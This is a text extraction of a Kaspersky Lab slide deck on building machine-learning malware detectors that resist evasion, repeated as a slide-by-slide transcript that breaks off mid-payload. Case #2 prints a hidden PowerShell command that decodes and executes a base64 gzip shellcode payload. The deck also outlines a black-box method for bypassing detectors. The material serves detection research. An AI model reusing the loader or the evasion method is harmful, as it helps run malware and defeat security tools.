Detection is not a classification:
reviewing machine learning
techniques for
cybersecurity specifics
Alexander Chistyakov
Research-Developer, Kaspersky Lab
2
Presentation plan [short]
1. Construct a powerful ML-based malware detector
2. Hack it and avoid the detection
3. Construct the new one and make it invulnerable
3
Presentation plan [detailed]
1. ML in cybersecurity: basic pipeline overview
2. Issues in classical ML detectors
• White box and black box attacks
• Suffering with false alarms
• Real-time detection problem
• Unclear reasons for detection
3. Reviewing the basis: constructing secure ML detectors
• Providing the invulnerability to the model
• Effective update of the model’s formula using false positives
• Effective and interpretable detection in the real-time mode
And also: discoveries, demonstrations and a bit of math ...
Benign file
Check next file
4
Basic detection pipeline with machine learning
Labeled as
malware?
Collect
training data
Train selected
model
Extract features
from samples
Provide labels
to samples
Select classifier’s
architecture
Take new item
(test data)
Predict test
item’s label
Setup detection
thresholds
Malicious file
Rise an alarm
NO
YES
In-lab training stage In-product testing stage
5
Vulnerabilities
in classical
machine learning
6
Malicious behavior detection
Pros:
1. Fileless threats processing
2. Hard to obfuscate
3. Detection of attacks based on benign software
Cons:
1. High risks for the system when analyzing a malicious sample
2. The risk of missing the hidden channels
3. Possible performance drawdown
Why «machine learning»?
1. Thousands of samples per day
2. Hundreds / thousands of events per sample
3. Complex dependencies are matter
ProcessStart(0)
LoadLibrary("c:windowssystem320c990d93e8c77d7549b1cf3d2.exe")
LoadLibrary("c:windowssystem32ntdll.dll")
LoadLibrary("c:windowssystem32kernel32.dll")
LoadLibrary("c:windowssystem32kernelbase.dll")
LoadLibrary("c:windowssystem32winmm.dll")
CreateThreadLocal(3471)
LoadLibrary("c:windowssystem32shell32.dll")
LoadLibrary("c:windowssystem32shlwapi.dll")
LoadLibrary("c:windowssystem32wshtcpip.dll")
LoadLibrary("c:windowssystem32wshqos.dll")
RegCreateKey("hklmsystemcontrolset001servicestcpipparameters")
RegCreateKey("hklmsoftwaremicrosoftsystemcertificatestrust")
RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesca")
LoadLibrary("c:windowssystem32iphlpapi.dll")
LoadLibrary("c:windowssystem32crypt32.dll")
CreateThreadLocal(2920)
RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesmy")
ModifyFile("c:program files7-zip7zcon.sfx")
RenameFile("c:program files7-zip7zcon.sfx“,
"c:program files7-zip7zcon.sfx.xoxoxo")
CreateFile("c:program files7-ziphistory.txt",[48495344F59206F66])
ModifyFile("c:program files7-ziphistory.txt")
ModifyFile("c:python26libidlelibcredits.txt.xoxoxo")
RenameFile("c:python26libidlelibcredits.txt.xoxoxo",
"c:python26libidlelibcredits.txt")
FileModified("c:program filesidacfgdsp563xx.cfg.xoxoxo")
RenameFile("c:program filesidacfgdsp563xx.cfg.xoxoxo",
"c:program filesidacfgdsp563xx.cfg")
...
7
Linear models
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
10
3
1
0
1
0
1
2.47 0.922
Malicious file
Input features Linear transformation
Model’s output
8
Linear models
10
3
1
0
1
0
1
2.47 0.922
Malicious file
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
9
Linear models
10
1
0
1
0
1
-3.62 0.027
Benign file
200
EASY TO IMPLEMENT
EASY TO TRAIN
EASY TO UNDERSTAND
EASY TO HACK
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
10
Neural network
10
3
1
0
1
0
1
3.29
-4.3
0.13
2.54 0.927
1
Hidden layer
Model’s output
Input features Linear transformation
Linear transformation
Malicious file
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
11
Neural networks
10
3
1
0
1
0
1
3.29
-4.3
0.13
1
Malicious file
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER
ARCHITECTURES
GOOD PERFORMANCE AND
DETECTION QUALITY
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
2.54 0.927
12
Neural networks
10
1
0
1
1
1.17
-2.3
0.61
-2.47 0.078
1
Benign file
STILL HACKABLE
LOTS OF OPEN LIBRARIES
NONLINEAR MULTILAYER
ARCHITECTURES
GOOD PERFORMANCE AND
DETECTION QUALITY
12
17
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
Advanced black-box attacks setup
No access to model’s weights…
… or architecture …
… or output scores
Just train your own model on victim’s detections,
and hack it to bypass the target detector
Behavior neural network detection quality
Dynamic classification issue [DEMO: Trojan.Win32.BitMiner]
Dynamic classification issue [DEMO: Google Chrome]
Dynamic classification issue [DEMO: Google Chrome]
FALSE ALARM
False alarms issue
False alarm
Malware detection
is an
undecidable
problem
Therefore, we will always have
some mistakes
False alarms issue
1. Create a white list:
+ fast
- need to choose radius
- loosing of detections
- complex surface
- unlimited growth of memory
False alarms issue
1. Create a white list:
+ fast
- need to choose radius
- loosing of detections
- complex surface
- unlimited growth of memory
2. Retrain the model:
+ same memory usage
- time expensive
- loosing of detections
Key issues of machine learning:
1.Models are unstable
2.Hard to fix errors
3.Hard to interpret
4.Models are vulnerable
24
Constructing secure
machine learning
detectors
25
No malicious code
could become clean
after the injection
of any new functionality
26
Secure linear models
10
3
1
0
1
0
1
2.47 0.922
Malicious file
MONOTONIC FEATURES
NONNEGATIVE WEIGHTSLOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
27
Secure linear models
10
0
0
1
0
1
2.68 0.935
Malicious file
200
MONOTONIC FEATURES
NONNEGATIVE WEIGHTSLOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
28
Secure neural networks
10
3
1
0
1
0
1
0.29
1.34
0.13
2.47 0.922
1
Malicious file
MONOTONIC ACTIVATION
FUNCTIONS
MONOTONIC FEATURES
NONNEGATIVE WEIGHTSLOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
Secure neural networks
29
10
3
1
0
1
0
1
2.47 0.922
Malicious file
5.02
3.29
2.47
2.47
0.17
1.26
7.31
0.17
-1.2
0.19
7.66
-1.2
Daniels, Hennie, and Marina Velikova. "Monotone and partially monotone neural networks.“
IEEE Transactions on Neural Networks 21.6 (2010): 906-917.
MONOTONIC ACTIVATION
FUNCTIONS
MONOTONIC FEATURES
NONNEGATIVE WEIGHTS
MIN-MAX POOLING
OUTPUT LAYER
K-LAYERS ARCHITECTURE FOR
K-DIMENTIONAL DATA
LOAD LIBRARY
CREATE FILE
INJECT TO
PROCESS
MODIFY SERVICE
CREATE SERVICE
MODIFY
REGISTRY
BIAS CONSTANT
30
Secure neural networks
…
ModifyFile(“notepad.exe”)
CreateFile(“config.xml”,0644)
CreateFile(“doc1.rtf”,0755)
ModifyFile(“doc1.rtf”)
ModifyFile(“doc1.rtf”)
CreateFile(“list.rtf”,0755)
ModifyFile(“list.rtf”)
ModifyFile(“config.xml”)
ModifyFile(“doc1.rtf”)
DeleteFile(“doc1.rtf”)
DeleteFile(“list.rtf”)
…
Delete
File
Create
File
Modify
File
list.rtf
notepad.exe
config.xml
doc1.rtf
0644
0755
Delete
File
Create
File
Modify
File
list.rtf
doc1.rtf
Modify
File list.rtf
notepad.exe
config.xml
doc1.rtf
Create
File
list.rtf
config.xml
doc1.rtf
0644
0755
Create
File
Modify
File
list.rtf
config.xml
doc1.rtf
2.47 0.922
Malicious
file
CREATE FILE
MODIFY FILE
DELETE FILE
DNS REQUEST
BIAS CONSTANT
4
4
2
0
1
31
Detection with monotonic models [DEMO: Trojan.Win32.BitMiner]
32
Detection with monotonic models [DEMO: Google Chrome]
33
Secure decision trees
0 40
6
12
18
24
8020 60
Cβ
Cα
NO YES
Cβ > 12
NO YES
YESNO
Malicious
file
Benign
file
Benign
file
Malicious
file
Cα > 70 Cα > 12
34
Secure decision trees
0 40
6
12
18
24
80
Cβ
Cα20 60
NO YES
Cβ > 12
NO YES
YESNO
Malicious
file
Benign
file
Benign
file
Malicious
file
Cα > 70 Cα > 20
35
Secure decision trees
0
6
12
18
24
40 8020 60
Cβ
Cα
Suspicious
file (25%)
Suspicious
file (50%)
NO YES
Cα > 40
NO YES
YESNO
Malicious
file
Benign
file
Cβ > 6 Cβ > 12
36
Secure decision trees
0
6
12
18
24
40 8020 60
Cβ
Cα
Suspicious
file (25%)
Suspicious
file (50%)
NO YES
Cα > 40
NO YES
YESNO
Malicious
file
Benign
file
Cβ > 6 Cβ > 12
NOT MONOTONIC
37
Secure decision trees
0
6
12
18
24
40 8020 60
Cβ
Cα
YES
YES
Cα > 40
YES
YES
NO
Malicious
file
Benign
file
Cβ > 6
Suspicious
file (60%)
Suspicious
file (33%)
Cβ > 12
Cβ > 12 Cβ > 6
Benign
file
Benign
file
YES
NO NO
NO
NO
Potharst, Rob, and Adrianus Johannes Feelders. "Classification
trees for problems with monotonicity constraints." ACM SIGKDD
Explorations Newsletter 4.1 (2002): 1-10.
Monotonic models toolbox
1. Artificial neural networks
• Dropout
• Batch / Weight normalization
• Min / Max / Average-pooling layers
• Autoencoders
• Recurrent networks
2. Decision trees
3. Classification ensembles
• Random forest
• AdaBoost
• Gradient boosting (including XGBoost)
4. Kernel-SVM
5. Nonparametric methods
• k-NN
• Parzen-window density estimator
6. …
Fixing false alarms in the monotonic space
False alarm
1. Detect a problem with
false positives
Fixing false alarms in the monotonic space
1. Detect a problem with
false positives
2. Identify the area of benign
behavior
Fixing false alarms in the monotonic space
1. Detect a problem with
false positives
2. Identify the area of benign
behavior
3. Join the benign area
boundary with your
model’s decision rule
FA fixing rules
44
Model's output
interpretation
Case #1: Trojan.Win32.BitMiner
More than 200K users affected
Score | Event
------------------------------------------------------------------------------------------------------------
2.734 | RegCreateKey("$hklmsoftwareminergateorganizationdefaultsminersmro")
2.737 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","visible","true")
4.238 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","pool","xmr.pool.minergate.com:45560")
Score | Event
-------------------------------------------------
-2.083 | RegCreateKey("$hklmsystemcontrolset001
| servicesdirectx11b")
-2.083 | RegSetValue("$hklmsystemcontrolset001
| servicesdirectx11b","imagepath",
| ""$appdataDirectX11bSystem.exe"")
-1.175 | InstallMd5("$appdatadirectx11bsystem.exe",
| 0x4635935FC972C582632BF45C26BFCB0E)
Score | Event
------------------------------------------------------------
-0.077 | WriteProcessMemory("bi16.cmd",0x000000007EFDF368,0,0,8)
-0.077 | ResumeThread("bi16.cmd")
-0.077 | LoadLibrary("$windirregedit.exe")
0.733 | CreateProcess("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
0.734 | CreateProcessInt("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
Case #2: Shellcode execution via powershell
CreateProcess("$system32windowspowershellv1.0powershell.exe",
""powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream( ,
[Convert]::FromBase64String(
'H4sIAKAhylkCA71W62/aSBD/nEr9H6wKCaOjYCdA00iVzk9wwjMG8zpUGXuxN6wf8SOY9Pq/
3yzYCb0mVa4fzkJiHzM7v/nNzM5uUt9KcOAzyB1EnsaP2jbz7f27s6EZmR7Dlrb2NKgypcxoV
s7OYL20vwvnm9kFavck5gvDLoUwlAPPxP7q6kpKowj5yXFea6NEiGPkrQlGMVth/mamLorQx8
H6DlkJ840pfa21SbA2SS62l0zLRcxHwbfpXjewTAqtpocEJ2z5r7/KleVHflVT7lOTxGxZ38c
J8mo2IeUK871CDY73IWLLPWxFQRxsktoU+xfntYkfmxvUh9MeUA8lbmDH5Qo4A78IJWnkM6du
0XOOUmwZhsMosATbjlAMSjXNfwi2iC35KSFV5k92mYO4Tf0Eewj2ExQFoY6iB2yhuNYxfZugW
7RZsX20K3x/qxJ7qgRSwySqVCEqr6PtBXZK0PGAcuVnvIeAVuDLgwo0fH//7v27TZEHJMuC9R
oHPe/xNBFgdLY8jBFgZYdBjA/iXxiuyvTAnJkE0R6mpXGUosqKWdJQLFcroLbVHHHiY/X1I/h
CHqTvv87mjqbA6tIIsL0CrTxUJTs17udfW3Tr9ayT0Qb7SN77poetIrHYl8hHG4IOPtcKsT5A
Y8v5BrJlRJBjJpTHKrP8WU3xcPKkK6aY2CgSLAhgDKggtpUfwRxDw5Y1v4c8IOs4L0MgNpDOq
JDOU3hfWKdzECpLxIzjKjNMoZ6sKqMjkyC7ygh+jPMtIU2Cw7D8DLeXkgRbZpwUx60qJ1TmJq
XAj5MotSCE4P5YD5GFTULZqDIdbCNxr2OnMF1+kQvJJAT7Dpz0ALGAFcqBntDEiABlkQSVmo4
SzQsJ8kDsUN4qMR0o5rwWDslkOsguv4CzyPNjUlNSCjZOUEKkdRIkVcbAUQIXBSU4T6rfxnFy
URSIpAjlwWGLGlqK+4SmfCmzxpe7YKDo8qVAszWn60BOlAAxahR4ohmjVkNPIqCN/VBXsNwcy
sGjAJ+i3o4MUZ8YC61nXxNdS/S5grsT19Uwrzkw308UZ5hw4c143LnW5Y4QyZm7EbRYUzrifs
SLgtXBn4xrcTIBPSx1R3eZJtii58ycubTThu5MA0NS19Ec+Bc11xK5BeeInCp1ddFVMCc4+qg
zavALrX5JRPyoa7rQmT7Ze7KjNBqdWTYW+r1rwVUHtsqfqwf9LdVfbNtdWTnMLTofzWMFK2BH
Uecjw0VTIxSniroYGaHm/LFzRka33lBdEdY1nHVDvQ4fzwMPyVhfNy/MaTNcewYHHE11zXd1a
yONO5Yn1uvGhO9rGKnj6ZbLdgqX7Y0+6AQtw/d8SqswrBst8TDKBvIk7d0Ju+6dkvVxI+vfbY
XpFl/vJn5n141BSuz3LDKenAfyhPNaRsPbZJQqQa7zyJnQUff8liw8lV93Rul81t8h6XO7xxG
vD3xii+JQ55SvCYcbgnzjuAfT4ghwXmeX3cjQG5/qnw2QXdxL5LOGN+p9hw91UxMgDcRrjMR7
EbjR1yF/G7bahQ/gdzbhQ8CXY+QAM+ba7c5DnZ/PBFvva9llW1N2ggC6yqU8c550h/WhLXSji
Pr5IPEBWdd5o78wt6Kpz/3bHdJGwCmYp3notaY3t+PmKPd7gsdHjm2KVcN2CH4IAs0k0G0C11
B5Pn7GOVQ0DfDcND28szXBGqi7zkyfqnfyB1pWUFclF12elMhrHbFnRrFrEigd6HHFVaYGkZq
3rWGAqQbLnjxjtijyEYH2Dw+E4jIQCAks2kJP2xx08WNvXcHVNoHhxfmLowrzJFh5bq3F0tXV
AiDTtnpS/bUu8p3ErXLZBcdBp+SyBgeev91dKQj37A9HVmnHpbT92xQ5mKrQm6iEB/Z0+H/wm
l+DLvzZb+T1ee0Xu2/imqseePhp9ceF/8T3b9IwNXEC8jrc5QQd3xm/ZCNPqJMH2iFikCeb/K
Pv5UGafOzDw+0fYnWge6ULAAA=‘
));IEX (New-Object IO.StreamReader(New-Object
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress
))).ReadToEnd();",0xF7722B62B4014E0C50ADFA9D60CAFA1C)
Case #3: Cryptor
Score | Event
-------------------------------------------------
-2.352 | FileAccessed("$programfiles7-zip7zcon.sfx",
| 00000010110000000010000100100001)
-2.343 | FileModified("$programfiles7-zip7zcon.sfx")
-2.335 | FileRenamed("$programfiles7-zip7zcon.sfx",
| "$programfiles7-zip7zcon.sfx.xoxoxo")
-1.296 | FileCreated("$programfiles7-ziphistory.txt",
| [484953544F5259206F66])
-0.996 | FileAccessed("$programfiles7-ziphistory.txt",
| 00000010110000000010000100100001)
-0.670 | FileModified("$programfiles7-ziphistory.txt")
-0.667 | FileCreated("$programfiles7-ziphistory.txt",
| [CE22AD093C70CD1A5ABC])
-0.653 | FileRenamed("$programfiles7-ziphistory.txt",
| “$programfiles7-ziphistory.txt.xoxoxo")
|
... | ...
|
1.967 | FileAccessed("c:python27license.txt",
| 00000010110000000010000100100001)
3.055 | FileModified("c:python27license.txt")
3.055 | CreateFile("c:python27license.txt",
| [E8FF9047336A051EB2E7])
3.646 | RenameFile("c:python27license.txt",
| "c:python27license.txt.xoxoxo")
... | ...
Case #4: ML detector against zero day threat:
 In October 2017 we have spotted BlackOasis activity. In this
attack flash zero day exploit was used -
https://securelist.com/blackoasis-apt-and-new-targeted-
attacks-leveraging-zero-day-exploit/82732/
 After successful execution of vulnerability payload is
executed
 In this attack a special technique for payload execution was
used:
• Special service was created
• Main malware modules were dropped to
%programdata%
• Modules included a legitimate utility
adaptertroubleshooter.exe
• This utility was used to load main malware module via
DLL hijacking
LET’S TALK?
Kaspersky Lab HQ
39A/3 Leningradskoe Shosse
Moscow, 125212, Russian Federation
Tel: +7 (495) 797-8700
www.kaspersky.com
49

BlueHat v17 || Detecting Compromise on Windows Endpoints with Osquery

  • 1.
    Detection is nota classification: reviewing machine learning techniques for cybersecurity specifics Alexander Chistyakov Research-Developer, Kaspersky Lab
  • 2.
    2 Presentation plan [short] 1.Construct a powerful ML-based malware detector 2. Hack it and avoid the detection 3. Construct the new one and make it invulnerable
  • 3.
    3 Presentation plan [detailed] 1.ML in cybersecurity: basic pipeline overview 2. Issues in classical ML detectors • White box and black box attacks • Suffering with false alarms • Real-time detection problem • Unclear reasons for detection 3. Reviewing the basis: constructing secure ML detectors • Providing the invulnerability to the model • Effective update of the model’s formula using false positives • Effective and interpretable detection in the real-time mode And also: discoveries, demonstrations and a bit of math ...
  • 4.
    Benign file Check nextfile 4 Basic detection pipeline with machine learning Labeled as malware? Collect training data Train selected model Extract features from samples Provide labels to samples Select classifier’s architecture Take new item (test data) Predict test item’s label Setup detection thresholds Malicious file Rise an alarm NO YES In-lab training stage In-product testing stage
  • 5.
  • 6.
    6 Malicious behavior detection Pros: 1.Fileless threats processing 2. Hard to obfuscate 3. Detection of attacks based on benign software Cons: 1. High risks for the system when analyzing a malicious sample 2. The risk of missing the hidden channels 3. Possible performance drawdown Why «machine learning»? 1. Thousands of samples per day 2. Hundreds / thousands of events per sample 3. Complex dependencies are matter ProcessStart(0) LoadLibrary("c:windowssystem320c990d93e8c77d7549b1cf3d2.exe") LoadLibrary("c:windowssystem32ntdll.dll") LoadLibrary("c:windowssystem32kernel32.dll") LoadLibrary("c:windowssystem32kernelbase.dll") LoadLibrary("c:windowssystem32winmm.dll") CreateThreadLocal(3471) LoadLibrary("c:windowssystem32shell32.dll") LoadLibrary("c:windowssystem32shlwapi.dll") LoadLibrary("c:windowssystem32wshtcpip.dll") LoadLibrary("c:windowssystem32wshqos.dll") RegCreateKey("hklmsystemcontrolset001servicestcpipparameters") RegCreateKey("hklmsoftwaremicrosoftsystemcertificatestrust") RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesca") LoadLibrary("c:windowssystem32iphlpapi.dll") LoadLibrary("c:windowssystem32crypt32.dll") CreateThreadLocal(2920) RegCreateKey("hkcusoftwaremicrosoftsystemcertificatesmy") ModifyFile("c:program files7-zip7zcon.sfx") RenameFile("c:program files7-zip7zcon.sfx“, "c:program files7-zip7zcon.sfx.xoxoxo") CreateFile("c:program files7-ziphistory.txt",[48495344F59206F66]) ModifyFile("c:program files7-ziphistory.txt") ModifyFile("c:python26libidlelibcredits.txt.xoxoxo") RenameFile("c:python26libidlelibcredits.txt.xoxoxo", "c:python26libidlelibcredits.txt") FileModified("c:program filesidacfgdsp563xx.cfg.xoxoxo") RenameFile("c:program filesidacfgdsp563xx.cfg.xoxoxo", "c:program filesidacfgdsp563xx.cfg") ...
  • 7.
    7 Linear models LOAD LIBRARY CREATEFILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT 10 3 1 0 1 0 1 2.47 0.922 Malicious file Input features Linear transformation Model’s output
  • 8.
    8 Linear models 10 3 1 0 1 0 1 2.47 0.922 Maliciousfile EASY TO IMPLEMENT EASY TO TRAIN EASY TO UNDERSTAND LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 9.
    9 Linear models 10 1 0 1 0 1 -3.62 0.027 Benignfile 200 EASY TO IMPLEMENT EASY TO TRAIN EASY TO UNDERSTAND EASY TO HACK LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 10.
    10 Neural network 10 3 1 0 1 0 1 3.29 -4.3 0.13 2.54 0.927 1 Hiddenlayer Model’s output Input features Linear transformation Linear transformation Malicious file LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 11.
    11 Neural networks 10 3 1 0 1 0 1 3.29 -4.3 0.13 1 Malicious file LOTSOF OPEN LIBRARIES NONLINEAR MULTILAYER ARCHITECTURES GOOD PERFORMANCE AND DETECTION QUALITY LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT 2.54 0.927
  • 12.
    12 Neural networks 10 1 0 1 1 1.17 -2.3 0.61 -2.47 0.078 1 Benignfile STILL HACKABLE LOTS OF OPEN LIBRARIES NONLINEAR MULTILAYER ARCHITECTURES GOOD PERFORMANCE AND DETECTION QUALITY 12 17 LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 13.
    Advanced black-box attackssetup No access to model’s weights… … or architecture … … or output scores Just train your own model on victim’s detections, and hack it to bypass the target detector
  • 14.
    Behavior neural networkdetection quality
  • 15.
    Dynamic classification issue[DEMO: Trojan.Win32.BitMiner]
  • 16.
    Dynamic classification issue[DEMO: Google Chrome]
  • 17.
    Dynamic classification issue[DEMO: Google Chrome] FALSE ALARM
  • 18.
    False alarms issue Falsealarm Malware detection is an undecidable problem Therefore, we will always have some mistakes
  • 19.
    False alarms issue 1.Create a white list: + fast - need to choose radius - loosing of detections - complex surface - unlimited growth of memory
  • 20.
    False alarms issue 1.Create a white list: + fast - need to choose radius - loosing of detections - complex surface - unlimited growth of memory 2. Retrain the model: + same memory usage - time expensive - loosing of detections
  • 21.
    Key issues ofmachine learning: 1.Models are unstable 2.Hard to fix errors 3.Hard to interpret 4.Models are vulnerable
  • 22.
  • 23.
    25 No malicious code couldbecome clean after the injection of any new functionality
  • 24.
    26 Secure linear models 10 3 1 0 1 0 1 2.470.922 Malicious file MONOTONIC FEATURES NONNEGATIVE WEIGHTSLOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 25.
    27 Secure linear models 10 0 0 1 0 1 2.680.935 Malicious file 200 MONOTONIC FEATURES NONNEGATIVE WEIGHTSLOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 26.
    28 Secure neural networks 10 3 1 0 1 0 1 0.29 1.34 0.13 2.470.922 1 Malicious file MONOTONIC ACTIVATION FUNCTIONS MONOTONIC FEATURES NONNEGATIVE WEIGHTSLOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 27.
    Secure neural networks 29 10 3 1 0 1 0 1 2.470.922 Malicious file 5.02 3.29 2.47 2.47 0.17 1.26 7.31 0.17 -1.2 0.19 7.66 -1.2 Daniels, Hennie, and Marina Velikova. "Monotone and partially monotone neural networks.“ IEEE Transactions on Neural Networks 21.6 (2010): 906-917. MONOTONIC ACTIVATION FUNCTIONS MONOTONIC FEATURES NONNEGATIVE WEIGHTS MIN-MAX POOLING OUTPUT LAYER K-LAYERS ARCHITECTURE FOR K-DIMENTIONAL DATA LOAD LIBRARY CREATE FILE INJECT TO PROCESS MODIFY SERVICE CREATE SERVICE MODIFY REGISTRY BIAS CONSTANT
  • 28.
  • 29.
    31 Detection with monotonicmodels [DEMO: Trojan.Win32.BitMiner]
  • 30.
    32 Detection with monotonicmodels [DEMO: Google Chrome]
  • 31.
    33 Secure decision trees 040 6 12 18 24 8020 60 Cβ Cα NO YES Cβ > 12 NO YES YESNO Malicious file Benign file Benign file Malicious file Cα > 70 Cα > 12
  • 32.
    34 Secure decision trees 040 6 12 18 24 80 Cβ Cα20 60 NO YES Cβ > 12 NO YES YESNO Malicious file Benign file Benign file Malicious file Cα > 70 Cα > 20
  • 33.
    35 Secure decision trees 0 6 12 18 24 408020 60 Cβ Cα Suspicious file (25%) Suspicious file (50%) NO YES Cα > 40 NO YES YESNO Malicious file Benign file Cβ > 6 Cβ > 12
  • 34.
    36 Secure decision trees 0 6 12 18 24 408020 60 Cβ Cα Suspicious file (25%) Suspicious file (50%) NO YES Cα > 40 NO YES YESNO Malicious file Benign file Cβ > 6 Cβ > 12 NOT MONOTONIC
  • 35.
    37 Secure decision trees 0 6 12 18 24 408020 60 Cβ Cα YES YES Cα > 40 YES YES NO Malicious file Benign file Cβ > 6 Suspicious file (60%) Suspicious file (33%) Cβ > 12 Cβ > 12 Cβ > 6 Benign file Benign file YES NO NO NO NO Potharst, Rob, and Adrianus Johannes Feelders. "Classification trees for problems with monotonicity constraints." ACM SIGKDD Explorations Newsletter 4.1 (2002): 1-10.
  • 36.
    Monotonic models toolbox 1.Artificial neural networks • Dropout • Batch / Weight normalization • Min / Max / Average-pooling layers • Autoencoders • Recurrent networks 2. Decision trees 3. Classification ensembles • Random forest • AdaBoost • Gradient boosting (including XGBoost) 4. Kernel-SVM 5. Nonparametric methods • k-NN • Parzen-window density estimator 6. …
  • 37.
    Fixing false alarmsin the monotonic space False alarm 1. Detect a problem with false positives
  • 38.
    Fixing false alarmsin the monotonic space 1. Detect a problem with false positives 2. Identify the area of benign behavior
  • 39.
    Fixing false alarmsin the monotonic space 1. Detect a problem with false positives 2. Identify the area of benign behavior 3. Join the benign area boundary with your model’s decision rule
  • 40.
  • 41.
  • 42.
    Case #1: Trojan.Win32.BitMiner Morethan 200K users affected Score | Event ------------------------------------------------------------------------------------------------------------ 2.734 | RegCreateKey("$hklmsoftwareminergateorganizationdefaultsminersmro") 2.737 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","visible","true") 4.238 | RegSetValue("$hklmsoftwareminergateorganizationdefaultsminersmro","pool","xmr.pool.minergate.com:45560") Score | Event ------------------------------------------------- -2.083 | RegCreateKey("$hklmsystemcontrolset001 | servicesdirectx11b") -2.083 | RegSetValue("$hklmsystemcontrolset001 | servicesdirectx11b","imagepath", | ""$appdataDirectX11bSystem.exe"") -1.175 | InstallMd5("$appdatadirectx11bsystem.exe", | 0x4635935FC972C582632BF45C26BFCB0E) Score | Event ------------------------------------------------------------ -0.077 | WriteProcessMemory("bi16.cmd",0x000000007EFDF368,0,0,8) -0.077 | ResumeThread("bi16.cmd") -0.077 | LoadLibrary("$windirregedit.exe") 0.733 | CreateProcess("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A) 0.734 | CreateProcessInt("$windirregedit.exe",""$windirregedit.exe" /s "Bi1.reg"",0x2E2C937846A0B8789E5E91739284D17A)
  • 43.
    Case #2: Shellcodeexecution via powershell CreateProcess("$system32windowspowershellv1.0powershell.exe", ""powershell.exe" -nop -w hidden -c $s=New-Object IO.MemoryStream( , [Convert]::FromBase64String( 'H4sIAKAhylkCA71W62/aSBD/nEr9H6wKCaOjYCdA00iVzk9wwjMG8zpUGXuxN6wf8SOY9Pq/ 3yzYCb0mVa4fzkJiHzM7v/nNzM5uUt9KcOAzyB1EnsaP2jbz7f27s6EZmR7Dlrb2NKgypcxoV s7OYL20vwvnm9kFavck5gvDLoUwlAPPxP7q6kpKowj5yXFea6NEiGPkrQlGMVth/mamLorQx8 H6DlkJ840pfa21SbA2SS62l0zLRcxHwbfpXjewTAqtpocEJ2z5r7/KleVHflVT7lOTxGxZ38c J8mo2IeUK871CDY73IWLLPWxFQRxsktoU+xfntYkfmxvUh9MeUA8lbmDH5Qo4A78IJWnkM6du 0XOOUmwZhsMosATbjlAMSjXNfwi2iC35KSFV5k92mYO4Tf0Eewj2ExQFoY6iB2yhuNYxfZugW 7RZsX20K3x/qxJ7qgRSwySqVCEqr6PtBXZK0PGAcuVnvIeAVuDLgwo0fH//7v27TZEHJMuC9R oHPe/xNBFgdLY8jBFgZYdBjA/iXxiuyvTAnJkE0R6mpXGUosqKWdJQLFcroLbVHHHiY/X1I/h CHqTvv87mjqbA6tIIsL0CrTxUJTs17udfW3Tr9ayT0Qb7SN77poetIrHYl8hHG4IOPtcKsT5A Y8v5BrJlRJBjJpTHKrP8WU3xcPKkK6aY2CgSLAhgDKggtpUfwRxDw5Y1v4c8IOs4L0MgNpDOq JDOU3hfWKdzECpLxIzjKjNMoZ6sKqMjkyC7ygh+jPMtIU2Cw7D8DLeXkgRbZpwUx60qJ1TmJq XAj5MotSCE4P5YD5GFTULZqDIdbCNxr2OnMF1+kQvJJAT7Dpz0ALGAFcqBntDEiABlkQSVmo4 